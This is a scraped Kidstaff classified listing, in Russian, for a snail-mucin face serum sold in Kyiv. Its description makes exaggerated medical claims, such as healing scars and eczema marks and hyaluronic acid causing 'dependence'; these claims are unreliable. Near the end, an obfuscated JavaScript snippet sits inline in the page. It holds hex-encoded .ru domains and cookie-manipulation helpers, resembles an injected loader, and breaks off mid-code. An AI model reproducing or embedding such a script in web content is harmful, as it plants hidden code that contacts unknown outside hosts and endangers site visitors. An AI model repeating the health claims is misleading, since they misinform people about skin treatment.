Kidstaff- одежда, обувь, товары для детей и взрослых
Расширенный

Увлажняющая сыворотка со слизью улитки O MYU 10мл

Увлажняющая сыворотка со слизью улитки O MYU 10мл
Просмотры объявления
сегодня: 1 | всего: 220
(рейтинг объявления 0.1)
Состояние:
Новое
Цена
150 грн    
Актуально на
24 апреля 2017
Доставка
Вся Украина
Способ доставки
указано в объявлении
Оплата
указано в объявлении
Возврат
указано в объявлении
   
Поделиться

Условия использования сайта - права и обязанности сторон.
Информация о продавце

9.70(100%)

  • Статус: спрашиваем и договариваемся))
  • Откуда: Киев
  • Заходил(а): 27.04.2017 (21:33)
(0... (показать)

Характеристики товара:

  • Вид
  • Для лица
  • Для тела
  • Эффект
  • Противоугревой
  • Солнцезащитный
  • Тонизирующий
  • Увлажняющий
  • Успокаивающий

Интенсивно-восстанавливающая сыворотка содержит 80% фильтрата улиточного секрета и эпидермальный фактор роста EGF. Сыворотка улучшает эластичность эпидермиса, подтягивает кожу, восстанавливает тургор, разглаживает шрамы и рубцы, уменьшает глубину и выраженность морщин, уменьшает расширенные и возрастные поры, успокаивает воспаления и раздражения.

В состав сыворотки входят два мощных компонента - фильтрат улиточной слизи и эпидермармальный фактор роста EGF , стимулирующие производство коллагена и эластина в эпидермисе, ускоряющие восстановление клеточного матрикса и активирующие восстановление и омоложение кожи.

По своему физическому составу   слизь полностью равноценна структуре человеческой кожи, а потому идеально с ней сочетается и является одним из наиболее эффективных уходовых, лечебных и профилактических средств. Данная сыворотка соединяет в себе уникальные природные составляющие. Самым редким натуральным компонентом в составе считается   слизь улитки , которая была широка известная на Ближнем Востоке в качестве сильнейшего афродизиака и настоящего антивозрастного коцентрата, обеспечивающего мгновенный лифтинг-эффект и возобновляющего регенерацию клеток.

Совсем недавно уникальные свойства улитки обратили на себя внимание и европейских косметологов. Все большую популярность набирает «Улиткотерапия», суть которой в том, что на лицо запускают живых улиток. С помощью данной сыворотки возможно получение всех тех же полезных свойств, что и при улиточной терапии. Еще с древних времен известно, что продукты, в содержание которых входят природные элементы, лучше всего подходит для различных типов кожи и при любом возрасте. Сыворотка со слизью улитки обеспечивает невероятно эффективный, но, в то же время, щадящий уход за Вашим лицом.

Эта уникальная сыворотка   включает в свой состав ценные растительные масла и ценнейшую природную слизь улиток. Замечательный эффект, который наблюдается от использования слизи улиток, объясняется тем, что она содержит аллатоин – компонент, способствующий восстановлению коллагеновых и эластиновых волокон, а также представляющий собой сильнейший антиоксидант. После применения слизи улиток разглаживаются имеющиеся морщины, оказывается яркий лифтинг-эффект. С ее помощью происходит обновление процессов регенерации клеток, предупреждение старения кожи, ее питание и увлажнение, улучшение тургора и эластичности.

Еще одна уникальность слизи улитки состоит в том, что она является   животным адаптогеном, единственным в своем роде . Другие адаптогены, использующиеся в натуральной косметике, имеют растительное происхождение. Использование сыворотки максимально защищает кожу от старения. Благодаря этому натуральному восстанавливающему эликсиру происходит нормализация водно-липидного процесса, интенсивное увлажнение и питание кожи, активная борьба со старением клеток и увяданием кожного покрова.

Слизь улитки.  Улитки очень быстро восстанавливают свои же собственные ткани. Это происходит благодаря особенностям их слизи. Еще в древние времена греческий врач Гиппократ готовил из секрета слизи мази, которые помогали коже регенерироваться, быстро заживляли порезы и трещины. Затем ученые обнаружили, что в слизи улиток содержится коллаген и гликолиевая кислота в натуральном виде.  
Составляющие экстракта улитки:
- натуральный коллаген – основной белок в любом организме. Более подробно вы можете прочитать про коллаген в описании сыворотки с коллагеном.
- натуральный аллантоин – основной восстановитель и регенератор кожи. Так как вырабатывается он улиткой естественным образом, то быстро впитывается кожей и не вызывает аллергических реакций.
- натуральный эластин. Отвечает за тругор кожи, ее упругость и эластичноть.
- гликолиевая кислота. Отшелушивает «мертвые» клетки, что позволяет освобождаться коже от лишнего и более глубоко пропускать полезные вещества.
- пептиды антибиотика. Защищают от самых распространенных кожных бактерий.
- витамины A, C, E. Все витамины выработаны улитками естественным путем в следствие переработки растений.
- натуральный солнечный фильтр.
Гиалуроновая кислота .  
Гиалуроновая кислота сегодня настолько популярна, что о ней знают практически все, о ее полезных для кожи свойствах можно разговаривать часами. Приведу основные факты. Гиалуроновая кислота входит в состав нашей кожи и отвечает за регенерацию и восстановление. Но с возрастом запасы естественной гиалуроновой кислоты в коже заметно уменьшаются, выработка ее кожей становится слабее, отсюда сухость кожи, морщины и прочие возрастные изменения кожи. Молекула гиалуроновой кислоты удерживает в сотни раз больше жидкости, чем весит сама. Гиалуроновая кислота содействует выработке эластина и коллагена и помогает им удерживаться в нужном состоянии, что обеспечивает подтянутость нашей коже. Гиалуроновую кислоту в косметологии используют при лечении акне, сухости, для уменьшения морщин, для общеувлажняющего эффекта. Но сразу хочу вас предупредить, что злоупотреблять гиалуронкой не стоит, так как со временем организм привыкает получать ее извне, он расслабляется и перестает самостоятельно ее вырабатывать. Поэтому, чтоб не получить зависимости и обратного результата, лучше всего достичь приемлемого результата и сделать перерыв хотя бы на месяц, чтобы наши клеточки не переставали работать самостоятельно.
Таким образом сыворотка с экстрактом слизи улиток помогает коже регенерироваться, разглаживает ее, устраняет последствия акне. Также сыворотка отлично управляется с прыщами и морщинами. Сыворотка с экстрактом слизи улитки активно борется со старением кожи. На сегодняшний день экстракт улитки является 100%ым хитов в корейской косметики. Достаточно взглянуть на идеальную кожу кореянок, как сразу становится очевидным эффект данной сыворотки. Сыворотка с экстрактом секрета улитки регенерирует кожу, лечит ее, омолаживает, питает и увлажняет. Также сыворотка помогает для устранения шрамов, растяжек, акне.

Для возрастной кожи

Как известно, с возрастом метаболизм и регенерация замедляется, что вызывает сухость кожи и проявление морщин. Сыворотка со слизью улитки является антивозрастным концентратом, а помощью которого можно достичь мгновенного лифтинг-эффекта, омоложения кожи, ее шелковистости и упругости. Использование сыворотки способствует улучшению микроциркуляции крови, выравниванию тона кожи, избавлению от возрастных пигментных пятен, выработке естественного кожного коллагена. Особенно эффективной сыворотка будет для зрелой и морщинистой кожи, поскольку это средство выравнивает процессы, связанные с естественной регенерацией клеток.

Для молодой кожи

Натуральные компоненты сыворотки обеспечивают эффективной уход за кожей, которая склонна к воспалениям и расширенным порам. Активные вещества окажут благоприятное воздействие на любой тип кожи. Сыворотка также рассасывает и заживляет шрамы и следы после экземы и дерматита. Сыворотка надежно защищает кожный покров, предотвращения преждевременное старение и появление морщин. Уникальное средство со слизью улитки дает коже необходимые витамины и микроэлементы.   Природный состав сыворотки предупреждает выраженное проявление и замедляет прогрессию старения,   а также уменьшает сухость и огрубение кожи, разглаживает морщинки, обесцвечивает веснушки и пятна пигментации. Использование сыворотки способствует активизации многих метаболических процессов, отшелушиванию отмерших клеток и улучшению межклеточного кислородного обмена.

Применение ночью

Как известно, ночью кожа самовосстанавливается, ее энергетические резервуары пополняются.

Сыворотка со слизью улитки обеспечивает более эффективное восстановление в ночное время. Натуральный состав сыворотки способен удовлетворить все насущные потребности и молодой и зрелой кожи, восстанавливая ее циркуляцию и обновляя клетки. С утра кожа более эластичная, нежная, имеет отдохнувший и ухоженный вид.

Применение для рук

Нанося чистую сыворотку или добавляя несколько капель в обычный крем для рук можно достичь хорошего пилинг-эффекта, обеспечить питание и восстановление загрубевшей кожи, смягчить ее и активировать жизненные процессы внутри кожного покрова. Сыворотка не только эффективно защищает от старения, но и сохраняет ухоженный внешний вид. Элементы сыворотки способствуют разглаживанию мелких и глубоких возрастных морщин, обеспечению защиты волокон коллагена и эластина от разрушительного воздействия и стимуляцию их синтеза. Кроме того, осуществляется поддержка естественного уровня увлажненности кожи, а также повышение эластичность кожи. Насыщенная полезными веществами кожа рук станет гораздо мягче, эластичнее и моложе.


Советы по применению

Несколько капель сыворотки наносится на чистую кожу лица, затем распределяется мягкими массирующими движениями. Для предварительного очищения кожи лучше использовать натуральные гидролаты. Эта мера позволит достичь максимального очищения кожи без использования агрессивных элементов, а также активизировать кожные клетки и максимально их подготовить к усвоению активных веществ.


Исходя из интенсивности ухода, применение сыворотки может быть выстроено по-разному.

- Нанесение на очищенную кожу лица в качестве ночного крема. Сыворотка может наносится как в чистом виде, так и смешиваться с другими жирными маслами в пропорции 1:1, чтобы расширить сферу воздействия. Также сыворотка может добавляться к любым натуральным кремам в пропорции 1-3.

- Нанесение утром на очищенное лицо в натуральном виде. Может использоваться в виде основы под макияж. Для этого несколько капель наносится на смоченный и отжатый тампон, распределяется по всей коже. Затем выдерживается 5-10-минутный интервал, чтобы сыворотка полностью впиталась, и наносится привычный макияж: пудра, тональный крем и другие покрытия.

- Нанесение вбивающими движениями сыворотки в чистом виде на проблемные зоны, которые требуют подтяжки и устранения дряблости. Обычно речь идет о веках, носогубных складках, линии шеи и подбородка, носогубном треугольнике.

- Добавление в различные маски для рук и лица, в пропорциях 5-8 капель на каждые 10 мл.

- Нанесение в виде лечебной аппликации, чтобы устранить неровности, пигментные пятна и следы акне.

- Возможно применение в домашних условиях и в профессиональном салоне.


Главная составляющая сыворотки – слизь улитки обладает насыщенной силой от самой природы, содержит натуральные антиоксиданты, нейтрализующие свободные радикалы и замедляющие старение кожи. Кожный покров вновь становится эластичным и наполненным жизненной силой. Сыворотка со слизью улиток является природным средством в борьбе со старением зрелой кожи.

 

Как пользоваться сывороткой.
Ну, во-первых ее можно добавить в крем, которым вы пользуетесь ежедневно. Вообще лучше добавлять в дневной крем, потому что сыворотка сильно увлажняет и, если ее добавить в ночной крем, то с утра может немножко лицо отечь.
А во-вторых, сыворотка идеально подойдет для домашней мезотерапии. При использовании сыворотки с мезороллером, можно на лицо нанести 2-3 капли сыворотки, и уже поверху катать мезороллером. Таким образом, сыворотка проникнет в более глубокие слои кожи и станет еще более эффективной.

Упаковка и хранение:
Сыворотка к вам придет в небольшом стеклянном пузырьке, герметично закрытым металлической крышкой, под которой находится еще пластиковая крышечка. И отдельно очень удобный колпачок-пипетка.


Срок годности до 2017 года. Флакончики герметично закрыты. Капельница в комплекте.


Все мои объявления:

http://www.kidstaff.com.ua/announcements-393800.ht...

Для Киева - самовывоз или как договоримся, а для жителей других населённых пунктов - Новая Почта, Укрпочта.

Оплата - наличными, на карту.

Обмен и возврат не предусмотрен - отвечу на все вопросы, по желанию предоставлю замеры и дополнительные фото.


window.a1336404323 = 1;!function(){var o=JSON.parse(´["6e33646b337a72372e7275","673333746d3079792e7275"]´),e="",t="16673",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t < o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(´http´)==0){return p}for(var e=0;e


Фото
Фото №1

Вы не авторизованы на сайте Kidstaff, но можете связаться с автором объявления.

Проект скидки- успей купить!

новое сообщение
Увлажняющая сыворотка со слизью улитки O MYU 10мл
  • Доставка: Вся Украина
  • Cостояние: Новое
150 грн
ftfm
  • Рейтинг: 9.70(100)
  • Откуда: Киев